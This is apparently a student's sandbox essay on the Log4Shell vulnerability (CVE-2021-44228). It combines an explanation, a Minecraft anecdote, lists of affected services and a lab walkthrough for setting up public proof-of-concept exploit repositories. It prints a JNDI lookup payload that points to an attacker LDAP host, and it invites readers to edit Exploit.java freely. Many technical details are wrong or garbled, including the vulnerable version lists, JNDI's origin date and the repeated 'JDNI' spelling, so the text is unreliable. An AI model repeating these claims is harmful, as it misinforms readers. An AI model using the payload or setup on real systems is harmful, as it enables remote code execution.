User:Dsfilak/sandbox

LOG4J is a ZERO DAY ATTACK, which means that the attack could of been prevented if the developers have known about it when developing the JDK. According to the CVE-2021-44228 ^[1], Apache log4j2 2.0-beta through 2.15.0 are the vulnerable systems to allow for attack to attack the Lightweight Directory Access Protocol (LDAP) AND Java Naming and Directory Interface (JDNI) within the Java And Apache applications that allows for remote code execution within a vulnerable software such as Minecraft. This CVE has a base score of 10 CRITICAL, meaning that it is the highest of vulnerabilities and requires immediately security updates or risk harm. This attack was able to be performed because of JNDI features in its config, and logs, where an attack would be able to send remote code through an LDAP server. The LOG4J-core jar file was found to be one of the main issues as well as parameters in the LDAP server that allows lookup messages from. The versions of Apache that were vulnerable:^[2] 2.0-beta9, 2.3.1, 2.4, 2.12.3, 2.13.0, and 2.17.0. Now looking back at the updates, Java 8u_20 is the vulnerable JAVA package that has a JDNI using and LDAP server that is vulnerable. 5 years later, the exploit was discovered and a few users on Twitter, one by the name of @An0maIous^[3] notified the internet. The Log4j was vulnerable on many platforms since 2016, Luckily not many malicious users were able to find the attack before it was patched. To be frank, the vulnerable was a simple mistake made by a developer years ago that just came to fortition in 2021. Every software that was using the Java that is within JAVAs naming and Directory Interface or known as the JDNI was affected and was recommended to immediately update their code.

Playing Minecraft in 2021(Yes, I still play), I remember seeing the log4j in action as I joined one of the most popular servers (Hypixel) on the day it started to make it's way through Minecraft, as people were able to see images through to the text chat, and if a player clicked on the image it would redirect you to a website. Once I saw the attack was being exploited on this big server, I changed to a smaller server that one of my friends owned and a guy joined and started the exploit, yet this one redirected me to live leak(Which I remember quite vividly as a dudes head was cut off on the first video). Being a curious teenager just going into college hell yeah I clicked it. Looking back, clicking on the exploit was probably not the smartest idea.

To see a video of someone abusing log4j in Minecraft click here. The video by Redstoner 2b2t, shows how log4j was used to take over another users account and blow up their base. During the video, a newspaper was being used to sent out a warning to users logging into the server as they could be exploited.

What is JDNI?^[4] JDNI stand for Java Naming and Directory Interface, which was created back in 2013 to have a feature called JDNI lookup that allows the feature to read logs. This is what malicious users would use exploit Minecraft servers as when they sent the ${jndi:ldap://0.0.0.0/#Exploit.payload} the lookup feature would read the logs and store the logs in the victims computer essentially gaining controls to perform an RCE on the victim.

What is LDAP? ^[5]LDAP stands for Lightweight Directory Access Protocol, this application is used to send data and find data from a directory access, in this case it was Minecraft's Log4j files. LDAP is a very common place for data such as Passwords and Usersnames as the server could be turned off to stop authentication.

Many Manufacturers were affected with the CVE-2021-44228 Log4j vulnerability due to the magnitude of the Log4j usage. The following services vulnerable to the LOG4j exploit: Apple^[7], Steam, Twitter, Tencent, Cloudflare, Amazon, Tesla, Apache Solr, Apache Druid, Ghidra, Ghidra server, Minecraft^[8], Blender, Google, LinkedIn and many more.

The Cybersecurity and Infrastructure Security Agency (CISA), released the following three steps to prevent the vulnerability:

"1. Enumerate any external facing devices that have log4j installed.

2. Make sure security operations is actioning every single alert on the devices that fall in the category above.

3. Install a web application firewall (WAF) with rules that automatically update."^[9]

Any systems that are running a Apache Log4j-Core version between 2.0-beta9 to 2.14.1 is vulnerable a suggested to update to at least 2.17.1^[10] Also recommended that you update your JDK versions to the most recent to gather all security patches. This CVE was not a very hard patch as it was just a simple mistake from a developer that did not realize than a JDNI Lookup could be exploited for an RCE.

One thing I wished I realized before spending hours on Minecraft was that I couldn't load it on the VM due to there being no graphics card able to emulate. I attempted to pass-through but could not find information on how to do it on Vsphere.

To get started on the demonstration you will need to first get the following:

1. Git clone https://github.com/kozmer/log4j-shell-poc

2. Git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Kozmer's Git hub has the LDAP server that is easy to run to get it started you will need to move it into a new directory.

Make sure Tangxiaofeng7 is also in the same dir.

Next you will also need Java1.8_20 for the Kozmer's Proof of concept. You can download all java versions here.

1. Unzip the JDK to the same directory as the Kozmer's Git. Sudo tar -xvzf $file$ /$Directory/. You can also unzip then move with mv $file /Dir.

2. Run the python3 poc.py in Kozmer's Directory.

Your LDAP server is up and running!

Set up a python http server or a netcat listener to send a curl of the exploit.java.

1. Python3 -m http.server 1337

To test that the exploit can be sent to you do Curl -I 0.0.0.0:1389 (Your LDAP server)

Now for your own fun.

Go into the directory holding the exploit with /CVE-2021-44228-Apache-Log4j-Rce/ and ls.

Open Exploit.java with your favorite notepad

Sudo nano ~/CVE-2021-44228-Apache-Log4j-Rce/Exploit.java

From there you can edit the New String and exploit the log4j all you want!

Luckily, most of the LOG4J applications that were vulnerable have been patches and earlier versions with the exploit are mostly EOL (end of life). From that you can no longer run the LOG4J vulnerability and all old systems are recommended to update to the latest version of Java and Apache.